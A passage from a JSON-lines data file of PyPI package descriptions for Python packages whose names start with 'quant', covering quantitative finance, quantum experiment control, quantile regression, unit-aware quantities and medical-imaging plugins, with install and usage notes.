Intraday PerformanceGOOGL Intraday Performance2022-11-25 09:30:0010010000.00%0.00%2022-11-25 09:31:00100.08100.130.050.08%0.13%2022-11-25 09:32:00100.24100.270.030.24%0.27%"} +{"package": "quantgo-api", "pacakge-description": "No description available on PyPI."} +{"package": "quantgo-cli", "pacakge-description": "To enable autocomplete feature 
type in console:export PATH=$PATH:~/src/qnet-cli/bin\ncomplete -C quantgo_complete quantgo"} +{"package": "quantgo-service-cli", "pacakge-description": "User Service CLI PythonInstallation:Install with pip into virtualenv or globally:pip install quantgo-service-cliTo enable autocomplete feature install cli tool and type in console:complete -C service_complete quantgo-serviceAPI client available:from qgservice import QuantGoServiceqg = QuantGoService()help(QuantGoService)"} +{"package": "quantgov", "pacakge-description": "BranchBuild StatusMasterDevThe QuantGov library is a companion to theQuantGov Platform. It provides an easy way to start a new project\nusing thequantgov startset of commands, and also provides a set of\nclasses and functions often used in the QuantGov framework.To install the library, usepip install quantgov.A tutorial of the library is available athttps://quantgov.github.io/quantgov-tutorial/pages/intro.html.How to ContributeCheck for open issues or open a fresh issue to start a discussion around a feature idea or a bug.Forkthe repositoryon GitHub to start making your changes to thedevbranch (or branch off of it).Write a test which shows that the bug was fixed or that the feature works as expected.Send a pull request and bug the maintainer until it gets merged and published. Make sure to add yourself toAUTHORS."} +{"package": "quanthub", "pacakge-description": "UNKNOWN"} +{"package": "quantificationlib", "pacakge-description": "QuantificationLibQuantificationLib is an open-source library for quantification learning.Installation and documentationThe installation, quick-start guide and documentation are availablehere."} +{"package": "quantifiedcode", "pacakge-description": "QCD"} +{"package": "quantifiles", "pacakge-description": "QuantifilesWelcome to Quantifiles, a PyQt5 application designed for viewing dataset files generated byQuantify-core. With Quantifiles, you can easily browse and visualize the contents of your data directory, including the ability to view a plot of the data and browse snapshots.InstallationInstall from PyPIpipinstallquantifilesInstall from sourceTo install Quantifiles from source, first clone the repository:gitclonehttps://gitlab.com/dcrielaard/quantifiles.gitcdquantifilesThen, install the application in a virtual environment using pip:pipinstall-e.Install with pipenvIf you prefer to use pipenv for managing your virtual environment, you can install Quantifiles with the following command:pipenvinstallgit+https://gitlab.com/dcrielaard/quantifiles.git#egg=quantifilesUsageYou can launch the application by running the following command in your terminal:quantifiles[--datadirDATADIR][--liveplotting][--loglevelLOGLEVEL]If you don't specify the data directory, you can still access it by selecting File->Open in the application.Alternatively, you can also use the executable file located in the Scripts folder, which will be generated upon installation.To start the application from within Python, run:fromquantifilesimportquantifilesquantifiles()# This will start the application, optionally you can pass the data directory as an argument.Tip:The plots can be copied to the clipboard by right-clicking on them.ContributingWe welcome contributions to Quantifiles! If you have an idea for a feature, or if you encounter a bug, pleaseopen an issueor submit a pull request.Feel free to dive in!LicenseThis project is licensed under the terms of the BSD 2-Clause License. 
See the LICENSE file for more details."} +{"package": "quantifin", "pacakge-description": "![example workflow](https://github.com/yueda27/quantifin/actions/workflows/CI_unittest.yml/badge.svg)"} +{"package": "quantify", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quantify-core", "pacakge-description": "quantify-coreQuantify is a Python-based data acquisition framework focused on Quantum Computing and\nsolid-state physics experiments.\nThe framework consists ofquantify-core(git|docs)\nandquantify-scheduler(git|docs).\nIt is built on top ofQCoDeSand is a spiritual successor ofPycQED.quantify-coreis the core module that contains all basic functionality to control experiments. This includes:A framework to control instruments.A data-acquisition loop.Data storage and analysis.Parameter monitoring and live visualization of experiments.Overview and CommunityFor a general overview of Quantify and connecting to its open-source community, seequantify-os.org.\nQuantify is maintained by the Quantify Consortium consisting of Qblox and Orange Quantum Systems.The software is free to use under the conditions specified in thelicense."} +{"package": "quantifymotion", "pacakge-description": "quantifymotion"} +{"package": "quantify-qblox", "pacakge-description": "Quantify QbloxQuantify Qblox is the Qblox hardware backend for Quantify, which is a Python-based data acquisition framework focused on Quantum Computing and solid-state physics experiments.The framework consists ofquantify-core(git|docs)\nandquantify-scheduler(git|docs).\nIt is built on top ofQCoDeSand is a spiritual successor ofPycQED."} +{"package": "quantify-scheduler", "pacakge-description": "quantify-schedulerQuantify is a Python-based data acquisition framework focused on Quantum Computing and\nsolid-state physics experiments.\nThe framework consists ofquantify-core(git|docs)\nandquantify-scheduler(git|docs).\nIt is built on top ofQCoDeSand is a spiritual successor ofPycQED.quantify-scheduleris a Python module for writing quantum programs featuring a hybrid gate-pulse control model with explicit timing control.\nThis control model allows quantum gate and pulse-level descriptions to be combined in a clearly defined and hardware-agnostic way.quantify-scheduleris designed to allow experimentalists to easily define complex experiments. 
It produces synchronized pulse schedules\nthat are distributed to control hardware, after compiling these schedules into control-hardware specific executable programs.Hardware/driver compatibilityQbloxquantify-schedulerqblox-instrumentsCluster firmwarev0.18.10.11.20.6.20.11.10.6.10.11.00.6.0v0.18.00.11.20.6.20.11.10.6.10.11.00.6.0v0.17.10.11.20.6.20.11.10.6.10.11.00.6.0v0.17.00.11.20.6.20.11.10.6.10.11.00.6.0v0.16.10.11.20.6.20.11.10.6.10.11.00.6.0v0.16.00.11.20.6.20.11.10.6.10.11.00.6.0v0.15.00.10.x0.5.00.9.00.4.0v0.14.00.10.x0.5.00.9.00.4.0v0.13.00.10.x0.5.00.9.00.4.0Zurich Instrumentszhinst==21.8.20515,zhinst-qcodes==0.1.4,zhinst-toolkit==0.1.5Overview and CommunityFor a general overview of Quantify and connecting to its open-source community, seequantify-os.org.\nQuantify is maintained by the Quantify Consortium consisting of Qblox and Orange Quantum Systems.The software is free to use under the conditions specified in thelicense."} +{"package": "quantifyspace", "pacakge-description": "quantifyspace"} +{"package": "quantile", "pacakge-description": "UNKNOWN"} +{"package": "quantile-data-kit", "pacakge-description": "Quantile Data Kit \ud83d\udd0dPublish to pypiHow to deploy a new version of the QDK?Update the package version insetup.py.Run the Makefilemake publishComponentsThere are four types of base components in the QDK.LoadComponent. Takes nothing as input and outputs a DataFrame.TransformComponent. Takes a DataFrame as input and outputs a DataFrame.TrainingComponent. Takes data and a model as input and outputs a trained model.InferenceComponent. Takes data and a model as input and ouputs prediction data.Adding a new component?Adding a new component to the QDK requires the following steps:Type of component:Decide which type of the four components above you are adding.Add component:Once you decide which type of component you are adding, add in the corresponding folder (e.g.qdk/loader) a new Python file that inherits from the parent component. In this file you can optionally overwriteinput_defs,output_defsandconfig_schema. When adding a new component, you are required to add a classmethod with the same name as thecompute_functionattribute on the parent class. The keys in theconfig_schemaare injected into the parameters of the compute function. Lastly, you need to import the new component toqdk/__init__.py. This allows you to import it from top-level.Write tests: To continuously check the robustness of the components, we highly encourage you to add tests usingpytest. The tests can be added atqdk/tests. Reminder to prefix the folder, files and functions withtest_. One is able to test the components using either VScode testing or the terminal (e.g. withpytest -s qdk/tests/test_loaders)."} +{"package": "quantile-estimator", "pacakge-description": "quantile-estimatorPython Implementation of Graham Cormode and S. Muthukrishnan's Effective Computation of Biased Quantiles over Data Streams in ICDE\u201905Installationpip install quantile-estimator==0.1.2This package can be found onPyPI."} +{"package": "quantile-forest", "pacakge-description": "quantile-forestquantile-forestoffers a Python implementation of quantile regression forests compatible with scikit-learn.Quantile regression forests (QRF) are a non-parametric, tree-based ensemble method for estimating conditional quantiles, with application to high-dimensional data and uncertainty estimation[1]. 
The estimators in this package are performant, Cython-optimized QRF implementations that extend the forest estimators available in scikit-learn to estimate conditional quantiles. The estimators can estimate arbitrary quantiles at prediction time without retraining and provide methods for out-of-bag estimation, calculating quantile ranks, and computing proximity counts. They are compatible with and can serve as drop-in replacements for the scikit-learn variants.Example of fitted model predictions and prediction intervals on California housing data (code)Quick StartInstall quantile-forest fromPyPIusingpip:pipinstallquantile-forestUsagefromquantile_forestimportRandomForestQuantileRegressorfromsklearnimportdatasetsX,y=datasets.fetch_california_housing(return_X_y=True)qrf=RandomForestQuantileRegressor()qrf.fit(X,y)y_pred=qrf.predict(X,quantiles=[0.025,0.5,0.975])DocumentationAn installation guide, API documentation, and examples can be found in thedocumentation.References[1]N. Meinshausen, \"Quantile Regression Forests\", Journal of Machine Learning Research, 7(Jun), 983-999, 2006.http://www.jmlr.org/papers/volume7/meinshausen06a/meinshausen06a.pdfCitationIf you use this package in academic work, please consider citinghttps://joss.theoj.org/papers/10.21105/joss.05976:@article{Johnson2024,doi={10.21105/joss.05976},url={https://doi.org/10.21105/joss.05976},year={2024},publisher={The Open Journal},volume={9},number={93},pages={5976},author={Reid A. Johnson},title={quantile-forest: A Python Package for Quantile Regression Forests},journal={Journal of Open Source Software}}"} +{"package": "quantile-ml", "pacakge-description": "No description available on PyPI."} +{"package": "quantile-python", "pacakge-description": "UNKNOWN"} +{"package": "quantile_regression_demo", "pacakge-description": "OVERVIEWMost of us are familiar with the charts that pediatricians use that show\npercentiles of weight and height as a function of age; generating such a chart\nfrom a small sample of data requires quantile regression or similar methods.\n(When working with a large enough sample of data, one can bin the data, i.e.,\ndivide the x-axis into intervals and calculate percentiles independently for\neach interval. But, this approach uses the data inefficiently and is unworkable\nwhen sample sizes are small).Quantiles and percentiles are the same except for a factor of 100, e.g., the\n30th percentile is the 0.3 quantile.This Python script demonstrates that one can perform quantile regression using\nonly Python, NumPy, and SciPy. The only other dependency is on matplotlib,\nwhich is used to plot the data and the quantile estimates.DETAILSIn detail, the script does the following:(1) Model parameters are assigned. 
(Currently, these are hardwired into the\ncode).(2) The program generates an artificial bivariate sample of data (x, y) as\nfollows:x is generated by drawing from a distribution that is uniform on [x_min, x_max], where x_min and x_max are currently 0 and 1, respectively.y is then generated according to a normal distribution having mean -0.5 + x and standard deviation 1.0 + 0.5 * x.(All of this can be changed, e.g., one could choose to make the mean of y quadratic in x).(3) The code defines an objective function based on the tilted absolute value\nfunction (see references for motivation).(4) The SciPy optimization package is then used to optimize (minimize) the\nobjective function.(5) Using the matplotlib module, the code plots a scatter diagram of the data\nwith an overlay of percentile lines."} +{"package": "quantile-scatter", "pacakge-description": "quantile_scatter\u4e0b\u306e\u65b9\u306b\u65e5\u672c\u8a9e\u306e\u8aac\u660e\u304c\u3042\u308a\u307e\u3059OverviewVisualization tool that makes it easier to get scatter plots right.The number of uniform data is divided into intervals on the x-axis, and the quantile points for each interval are displayed.Usageimportquantile_scatter# dummy datax_ls=[(4*random.random()-2)**3for_inrange(1000)]y_ls=[math.sin(x)+random.random()*0.5forxinx_ls]# plot [quantile_scatter]quantile_scatter.plot(x=x_ls,# x-listy=y_ls,# y-listmin_bin_ratio=1/20,# Ratio of the smallest group (the number of records in the smallest group as a percentage of the total)ile_ls=[0.25,0.5,0.75])Advanced UsageOption argument ofquantile_scatter.plot()function:mean=True# Also draw the \"mean\"show=False# Do not show the graph and only return the data to be displayed (useful for saving the graph or drawing with something other than matplotlib)missing_values=[None]# The specification that x contains a missing value of \"None\". 
Internally, the value is included in the statistics as \"missing\".\u6982\u8981\u6563\u5e03\u56f3\u3092\u6b63\u3057\u304f\u628a\u63e1\u3057\u3084\u3059\u304f\u3059\u308b\u53ef\u8996\u5316\u30c4\u30fc\u30eb\u5747\u4e00\u30c7\u30fc\u30bf\u6570\u306e\u6a2a\u8ef8\u533a\u9593\u306b\u5206\u3051\u3001\u5404\u533a\u9593\u306e\u5206\u4f4d\u70b9\u3092\u8868\u793a\u3059\u308b\u8aac\u660e\u306f\u57f7\u7b46\u4e2d\u3067\u3059\u4f7f\u7528\u4f8bimportquantile_scatter# \u30c0\u30df\u30fc\u30c7\u30fc\u30bfx_ls=[(4*random.random()-2)**3for_inrange(1000)]y_ls=[math.sin(x)+random.random()*0.5forxinx_ls]# \u5206\u4f4d\u70b9\u6563\u5e03\u56f3\u306e\u63cf\u753b [quantile_scatter]quantile_scatter.plot(x=x_ls,# \u6a2a\u8ef8\u6570\u5024\u30ea\u30b9\u30c8y=y_ls,# \u7e26\u8ef8\u6570\u5024\u30ea\u30b9\u30c8min_bin_ratio=1/20,# \u6700\u5c0f\u30b0\u30eb\u30fc\u30d7\u5272\u5408 (\u6700\u3082\u5c0f\u3055\u3044\u30b0\u30eb\u30fc\u30d7\u306e\u30ec\u30b3\u30fc\u30c9\u6570\u304c\u5168\u4f53\u306b\u5360\u3081\u308b\u5272\u5408)ile_ls=[0.25,0.5,0.75]# \u3069\u3053\u306e\u5206\u4f4d\u70b9\u3092\u51fa\u3059\u304b)\u767a\u5c55\u7684\u306a\u5229\u7528\u65b9\u6cd5quantile_scatter.plot()\u95a2\u6570\u306eoption\u5f15\u6570mean=True# \u300c\u5e73\u5747\u300d\u3082\u63cf\u753b\u3059\u308bshow=False# \u30b0\u30e9\u30d5\u8868\u793a\u305b\u305a\u3001\u8868\u793a\u5bfe\u8c61\u30c7\u30fc\u30bf\u306e\u307f\u3092\u8fd4\u5374 (\u30b0\u30e9\u30d5\u3092\u4fdd\u5b58\u3057\u305f\u3044\u5834\u5408\u3084\u3001matplotlib\u4ee5\u5916\u3067\u63cf\u753b\u3057\u305f\u3044\u5834\u5408\u306a\u3069\u306b\u6709\u52b9)missing_values=[None]# x\u306bNone\u3068\u3044\u3046\u6b20\u640d\u5024\u304c\u542b\u307e\u308c\u308b\u3068\u3044\u3046\u6307\u5b9a\u3002\u5185\u90e8\u7684\u306b\u306f\"missing\"\u3068\u3044\u3046\u5024\u3068\u3057\u3066\u96c6\u8a08\u306b\u542b\u3081\u3089\u308c\u308b\u3002"} +{"package": "quantile-transformer-tf", "pacakge-description": "[![Build Status](https://travis-ci.com/yandexdataschool/QuantileTransformerTF.svg?branch=master)](https://travis-ci.com/yandexdataschool/QuantileTransformerTF) [![DOI](https://zenodo.org/badge/156366202.svg)](https://zenodo.org/badge/latestdoi/156366202)# QuantileTransformerTF\nTensorflow implementation ofsklearn.preprocessing.QuantileTransformer. Transform only - please use the sklearn to fit.## InstallationThe releases are published on PyPi` pip install quantile_transformer_tf `To install from the source` python setup.py install `## Usage\nPlease see the docstrings andtest.pyPlease cite as [![DOI](https://zenodo.org/badge/156366202.svg)](https://zenodo.org/badge/latestdoi/156366202)"} +{"package": "quantimpy", "pacakge-description": "quantimpyWelcome to QuantImPy, a Python library for scientific image processing.This code performs morphological operations on Numpy arrays and can compute the\nMinkowski functionals and functions.This code is inspired by and partly based on theQuantIm\nlibraryC/C++ library for scientific\nimage processing.Documentation can be found onGithub.ioThis library is available onpypi.organd\ncan be installed using pip:pip install quantimpyIf you use this package in your research, please cite it as:Arnout M.P. Boelens, and Hamdi A. 
Tchelepi,QuantImPy: Minkowski functionals\nand functions with Python, SoftwareX, Volume 16, 2021, 100823, ISSN 2352-7110,\ndoi:10.1016/j.softx.2021.100823"} +{"package": "quantinuum-schemas", "pacakge-description": "Quantinuum schemasShared data models for Quantinuum.DependenciesWe try to keep the dependencies minimal.\nHowever we do needpydanticfor validation andpytketfor core (serialisable) models."} +{"package": "quant-invest-lab", "pacakge-description": "Quant Invest LabQuant Invest Labis a project aimed to provide a set of basic tools for quantitative experiments. By quantitative experiment I mean trying to build you own set of investments solution. The project is still in its early stage, but I hope it will grow in the future.Initially this project was aimed to be a set of tools for my own experiments, but I decided to make it open source. Of courses it already exists some awesome packages, more detailed, better suited for some use cases. But I hope it will be useful for someone else (learn, practice, understand and create). Feel free to use it, modify it and contribute to it. This package is basically the package I wanted to find when I started to learn quantitative finance.Main featuresData: download data from external data provider without restriction on candle stick, the main provider is kucoin for now (currently only crypto data are supported).Backtesting: backtest your trading strategy (Long only for now but soon short and leverage) on historical data for different timeframe. Optimize you take profit, stop loss. Access full metrics of your strategy.Indicators: a set of indicators to help you build your strategy.Portfolio: a set of portfolio optimization tools to help you build your portfolio.Simulation: simulate your data based on real data using statistics to get a better understanding of its behavior during backtesting.Metrics: a set of metrics to help you evaluate your strategy through performances and risks.InstallationTo installQuant Invest Labthrough pip, run the following command:pipinstallquant-invest-lab--upgradeYou can install it using poetry the same way :poetryaddquant-invest-labBasic examplesBacktest a basic EMA crossover strategyimportpandasaspdfromquant_invest_lab.backtestimportohlc_long_only_backtesterfromquant_invest_lab.data_providerimportdownload_crypto_historical_datasymbol=\"BTC-USDT\"timeframe=\"4hour\"df_BTC=download_crypto_historical_data(symbol,timeframe)# Define your indicatorsdf_BTC[\"EMA20\"]=df_BTC.Close.ewm(20).mean()df_BTC[\"EMA60\"]=df_BTC.Close.ewm(60).mean()df_BTC=df_BTC.dropna()# Define your strategy entry and exit functionsdefbuy_func(row:pd.Series,prev_row:pd.Series)->bool:returnTrueifrow.EMA20>row.EMA60elseFalsedefsell_func(row:pd.Series,prev_row:pd.Series,trading_days:int)->bool:returnTrueifrow.EMA20>>fromquantiphyimportQuantity>>>Tclk=Quantity(10e-9,'s')>>>print(Tclk)10ns>>>Fhy=Quantity('1420.405751786 MHz')>>>print(Fhy)1.4204GHz>>>Rsense=Quantity('1e-4\u03a9')>>>print(Rsense)100u\u03a9>>>cost=Quantity('$11_200_000')>>>print(cost)$11.2M>>>Tboil=Quantity('212 \u00b0F',scale='\u00b0C')>>>print(Tboil)100\u00b0COnce you have a quantity, there are a variety of ways of accessing aspects of\nthe quantity:>>>Tclk.real1e-08>>>float(Fhy)1420405751.786>>>2*cost22400000.0>>>Rsense.units'\u03a9'>>>str(Tboil)'100 \u00b0C'You can use therendermethod to flexibly convert the quantity to a string:>>>Tclk.render()'10 ns'>>>Tclk.render(show_units=False)'10n'>>>Tclk.render(form='eng',show_units=False)'10e-9'>>>Fhy.render(prec=8)'1.42040575 
GHz'>>>Tboil.render(scale='\u00b0F')'212 \u00b0F'Thefixedmethod is a variant that specializes in rendering numbers without\nscale factors or exponents:>>>cost.fixed(prec=2,show_commas=True,strip_zeros=False)'$11,200,000.00'You can use the string format method or the new format strings to flexibly\nincorporate quantity values into strings:>>>f'{Fhy}''1.4204 GHz'>>>f'{Fhy:.6}''1.420406 GHz'>>>f'\u276c{Fhy:<15.6}\u276d''\u276c1.420406 GHz \u276d'>>>f'\u276c{Fhy:>15.6}\u276d''\u276c 1.420406 GHz\u276d'>>>f'{cost:#,.2P}''$11,200,000.00'>>>f'Boiling point of water:{Tboil:s}''Boiling point of water: 100 \u00b0C'>>>f'Boiling point of water:{Tboil:s\u00b0F}''Boiling point of water: 212 \u00b0F'QuantiPhyhas many more features and capabilities. For more information, view\nthedocumentation."} +{"package": "quantiphy-eval", "pacakge-description": "Author:Ken KundertVersion:0.5.0Released:2022-09-02A companion toQuantiPhy,quantiphy_evalevaluates strings containing simple algebraic expressions that involve\nquantities. It returns a quantity. For example:>>> from quantiphy_eval import evaluate\n\n>>> avg_price = evaluate('($1.2M + $1.3M)/2', '$')\n>>> print(avg_price)\n$1.25M\n\n>>> avg_freq = evaluate('(122.317MHz + 129.349MHz)/2', 'Hz')\n>>> print(avg_freq)\n125.83 MHzQuantiPhy Evalis used innetworthto allow you to give your estimated values using expressions that include\nnumbers that have units, SI scale factors, and commas. That allows you the\nconvenience of copy-and-pasting your numbers from websites without being forced\nto reformat them.WithQuantiPhythe units do not survive operations, so you can specify the\nresolved units using the second argument. In fact, the second argument is\npassed toQuantiPhyas themodel,\nwhich allows you to give the return value a name and description along with\nunits, as demonstrated in the next example.By defaultQuantiPhy Evalprovides no built-in constants.\nHowever, you can add your own constants:>>> from quantiphy import Quantity\n>>> from quantiphy_eval import evaluate, initialize\n>>> import math\n\n>>> my_constants = dict(\n... k = Quantity('k'),\n... q = Quantity('q'),\n... T = Quantity('25\u00b0C', scale='K'),\n... \u03c0 = Quantity(math.pi),\n... \u03c4 = Quantity(math.tau),\n... )\n>>> initialize(variables=my_constants)\n\n>>> Vt = evaluate('k*T/q', 'Vt V thermal voltage')\n>>> print(Vt.render(show_label='f'))\nVt = 25.693 mV \u2014 thermal voltageAlternatively, you can specify the model directly in the text passed toevaluate. Simply append it in the form of a double-quoted string:>>> Vt = evaluate('k*T/q \"Vt V thermal voltage\"')\n>>> print(Vt.render(show_label='f'))\nVt = 25.693 mV \u2014 thermal voltageYou can also useevaluateto assign values to names directly,QuantiPhy Evalremembers these values between calls toevaluate:>>> f_0 = evaluate('f\u2080 = 1MHz')\n>>> omega_0 = evaluate('\u03c9\u2080 = \u03c4*f\u2080 \"rads/s\"')\n>>> print(omega_0.render(show_label=True))\n\u03c9\u2080 = 6.2832 Mrads/sSimilarly,QuantiPhy Evalprovides no built-in functions by default, but you\ncan add any you need:>>> def median(*args):\n... args = sorted(args)\n... l = len(args)\n... m = l//2\n... if l % 2:\n... return args[m]\n... 
return (args[m] + args[m-1])/2\n\n>>> initialize(functions = dict(median=median))\n>>> median_price = evaluate('median($636122, $749151, $706781)', '$')\n>>> print(median_price.fixed(show_commas=True))\n$706,781initializetakes three arguments,variables,functionsandquantity.\nBothargumentsandfunctionstake dictionaries that overwrite any previously\nsaved values.quantitytakes aquantiphyQuantityclass. The return value\nofevaluatewill be an object of this class.rm_commasis a function for removing commas from an expression. This is used\nif your number contain commas. Simply stripping the commas it would prevent you\nfrom using multi-argument functions. However after removing the commasrm_commasalso converts semicolons to commas. So the previous example could\nbe rewritten as:>>> from quantiphy_eval import evaluate, rm_commas\n\n>>> median_price = evaluate(\n... rm_commas('median($636,122; $749,151; $706,781)'),\n... '$',\n... )\n>>> print(median_price.fixed(show_commas=True))\n$706,781QuantiPhy Evalsupports comments. A#and anything that follows it to the\nend of the line is ignored:>>> average_price = evaluate(\n... rm_commas('''\n... median(\n... $636,122 + # Zillow\n... $749,151 + # Redfin\n... $706,781 # Trulia\n... )/3\n... '''),\n... '$'\n... )\n>>> print(average_price.fixed(show_commas=True, prec=2, strip_zeros=False))\n$697,351.33Finally,QuantiPhy Evalusesinform.Errorfor error reporting:>>> from inform import Error\n\n>>> try:\n... Vt = evaluate('kT/q', 'V')\n... print(Vt)\n... except Error as e:\n... print(str(e))\nkT: variable unknown.ReleasesLatest development release:Version: 0.5.0Released: 2022-09-020.5 (2022-09-02):refactor the project structureprovideqeexample, a simple calculator0.4 (2021-01-27):Add ability to explicitly specify units (or model) in evaluated string.0.3 (2020-08-12):complete re-write, parser now implemented with ply rather than pyparsing.all built-in constants and functions have been removed.splitevaluateinto two:evaluateandinitialize.0.2 (2020-03-06):rm_commasnow converts semicolons to commassupport comments0.1 (2020-03-05):Add support for user-defined constants and functions.addrm_commasfunction.0.0 (2020-02-14):Initial version."} +{"package": "quantiphyse", "pacakge-description": "QuantiphyseViewer and data processing for 3D/4D medical imaging dataOverviewQuantiphyse provides tools for modelling and analysis of 3D/4D volumetric data, principally MRI data.Core features:Loading/Saving 3D/4D NIFTI filesAnalysis tools including single/multiple voxel analysis and data comparisonGeneric processing including smoothing, resampling, clusteringFeatures available via pluginsRegistration, motion correctionModelling tools for DCE, ASL, DSC and CEST MRIIntegration of selected FSL toolsSee:http://quantiphyse.readthedocs.org/en/latest/for full documentation.LicenseQuantiphyse is available free under an academic (non-commercial) license. 
See theLICENSEfile for\nfull details, and contactOUIif interested in\ncommercial licensing.InstallationSeehttps://quantiphyse.readthedocs.io/en/latest/basics/install.htmlfor current installation\ninstructionsRunning from source code (for developers)Running from source is recommended only if your are interested in developing the software further.Install the dependencies:The list of Python dependencies is inrequirements.txtFor example:pip install -r requirements.txtBuild extensionspython setup.py build_ext --inplaceRun from source directorypython qp.pyPackagingThe scripts packaging/build.py is used to build a frozen distribution package in the form of a compressed archive (tar.gzor.zip)\nand a platform-dependent package (deb,msiordpg). It should run autonomously, however you may need to input the sudo password\non Linux in order to build adebpackage.The--snapshotoption removes the version number from package filenames so you can provided them for download without having to change the link URLs.The--maxioption builds a package which includes selected plugins, assuming these are downloadedTo Do listIssue trackerCurrent issues can be viewed on the GitHub issue tracker (https://github.com/physimals/quantiphyse/issues)Roadmapv0.6 (Released June 2018)ASL tools first version (preprocess, model fit, calibration, multiphase)Improved viewer (full resolution, aligned)v0.8 (Target Mar 2019)Integration of selected FSL tools (FLIRT, FAST, BET, FSL_ANAT?) [x]Improved registration support (apply transform) [x]Improved ASL tools based on oxasl (inc. ENABLE, VEASL, DEBLUR) [x]Fabber T1 [x]Fabber DCE [x]DSC widget [x]Improvements to ROI builder - working 'paint' tool [x]Motion simulation [x]Add noise [x]v0.10 (Target 2020)Stable interface for QpWidget, QpData, Process [ ]Python 3 [x]Support PySide and PySide2 - ideally the latter by default [x]Improved manual data alignment tools [ ]Multi-overlay view [x]Perfusion simulator [x]Migration to PySide2Current version of Quantipihyse is targeted at Pyside2Shouldstill run under Pyside1 but not guaranteedCurrently using our own fork ofpyqtgraphawaiting official release with Pyside2 supportVague Plans for FutureMoCo/RegistrationBartek's MC method3D viewProbably not that useful but fun and may be easy(?) with vispy. Reliant on good refactoring of ImageViewApplication to surfaces (Tom K?)Use VisPy?Add Jola's texture analysis which sounds cool, whatever it isPK modelling validationQIBA [x]QINSimplify/rewrite generic Fabber interfaceImprove memory usage by swapping out data which are not being displayed?All widgets which process within ROI should work with the subimage within the bounding box of the\nROI, not the whole image.Supervoxels does this already with great performance improvement.Support other file formats using NIBABEL.DICOM conversion included where DCMSTACK is availableAdd semiquantitative measuresArea under the curveEnhancing fraction"} +{"package": "quantiphyse-asl", "pacakge-description": "ASL plugin for QuantiphyseThis plugin provides modelling tools for ASL-MRI.Quantiphyse and quantiphyse-fabber must be installed. To\ninstall the plugin from PyPi use:pip install quantiphyse-aslThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-cest", "pacakge-description": "CEST plugin for QuantiphyseThis plugin provides modelling tools for CEST-MRI using the\nFabber Bayesian model fitting tool.Quantiphyse and quantiphyse-fabber must be installed. 
To\ninstall the CEST plugin from PyPi use:pip install quantiphyse-cestThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-cvr", "pacakge-description": "CVR plugin for QuantiphyseThis plugin provides modelling tools for cerebrovascular reactivity\n(CVR) using BOLD-MRI with PETCO2Quantiphyse and quantiphyse-fabber must be installed. To\ninstall the plugin from PyPi use:pip install quantiphyse-cvrThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-datasim", "pacakge-description": "Data simulation plugin for QuantiphyseThis plugin provides data simulation tools.Quantiphyse and quantiphyse-fabber must be installed. To\ninstall the plugin from PyPi use:pip install quantiphyse-datasimThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-dce", "pacakge-description": "DCE plugin for QuantiphyseThis plugin provides modelling tools for DCE-MRI. Currently\ntwo implementations are provided - one based on the Tofts-Orton\nmodel and one using the Fabber Bayesian model fitting tool which\nsupports both measured and population AIFsQuantiphyse and quantiphyse-fabber must be installed. To\ninstall the DCE plugin from PyPi use:pip install quantiphyse-dceThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-deeds", "pacakge-description": "Quantiphyse plugin for the DEEDS registration methodDEEDS is a fully deformable registration method developed by Matthias Heinrich.\nFor more information on DEEDS and related projects see:http://www.mpheinrich.de/software.htmlThis plugin incorporates a version of the DEEDS code with the author's permission. See\nLICENSE for copyright information.ReferencesMRF-Based Deformable Registration and Ventilation Estimation of Lung CT.by Mattias P. Heinrich, M. Jenkinson, M. Brady and J.A. Schnabel IEEE Transactions on Medical Imaging 2013, Volume 32, Issue 7, July 2013, Pages 1239-1248http://dx.doi.org/10.1109/TMI.2013.2246577Multi-modal Multi-Atlas Segmentation using Discrete Optimisation and Self-Similaritiesby Mattias P. Heinrich, Oskar Maier and Heinz Handels VISCERAL Challenge@ ISBI, Pages 27-30 2015http://ceur-ws.org/Vol-1390/visceralISBI15-4.pdfMIND: Modality Independent Neighbourhood Descriptor for Multi-modal Deformable Registrationby MP Heinrich, M Jenkinson, M Bhushan, T Matin, F Gleeson, M Brady, JA Schnabel, Medical Image Analysis. vol. 16(7) 2012, pp. 1423-1435For Quantiphyse documentation see:https://quantiphyse.readthedocs.io/"} +{"package": "quantiphyse-dsc", "pacakge-description": "DSC plugin for QuantiphyseThis plugin provides modelling tools for DSC-MRI.Quantiphyse and quantiphyse-fabber must be installed. To\ninstall the plugin from PyPi use:pip install quantiphyse-dscThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-fabber", "pacakge-description": "Fabber plugin for QuantiphyseQuantiphyse is a visualisation and data analysis tool for volumetric\nmedical imaging data especially MRI. 
Seehttps://quantiphyse.orgfor more\ninformation.Fabber is a model fitting tool designed to fit nonlinear parameterised\nmodels to 4D fMRI data such as ASL, CEST, DCE, DSC, etc.To install, either use the setup script or:pip install quantiphyse-fabberThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-fsl", "pacakge-description": "FSL plugin for QuantiphyseThis plugin provides a Quantiphyse interface to selected FSL\ntools, currently:BETFASTFLIRT/MCFLIRT (via the registration widget)FSL_ANAT (experimental)Atlasses/standard dataQuantiphyse and FSL must be installed. Note that this plugin is\nan interface only and contains no FSL code itself!\nTo install the plugin from PyPi use:pip install quantiphyse-fslThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-qbold", "pacakge-description": "qBOLD plugin for QuantiphyseThis plugin provides modelling tools for qBOLD-MRI.Quantiphyse and quantiphyse-fabber must be installed. To\ninstall the plugin from PyPi use:pip install quantiphyse-qboldThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-sv", "pacakge-description": "Supervoxels plugin for QuantiphyseThis plugin provides supervoxels clustering method for QuantiphyseQuantiphyse must be installed. To install the plugin from PyPi use:pip install quantiphyse-svThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-t1", "pacakge-description": "T1 plugin for QuantiphyseThis plugin provides Bayesian modelling code for generating T1\nmaps from VFA MRI dataQuantiphyse and quantiphyse-fabber must be installed. To\ninstall the plugin from PyPi use:pip install quantiphyse-t1The plugin will then be available from within Quantiphyse"} +{"package": "quantiprot", "pacakge-description": "Quantiprotcurrent version: 0.2.5The Quantiprot package is a python package designed to facilitate quantitative analysis of protein sequences.The Quantiprot package is developed and maintained atPolitechnika Wroclawskawith financial support fromNational Science Centregrant no. 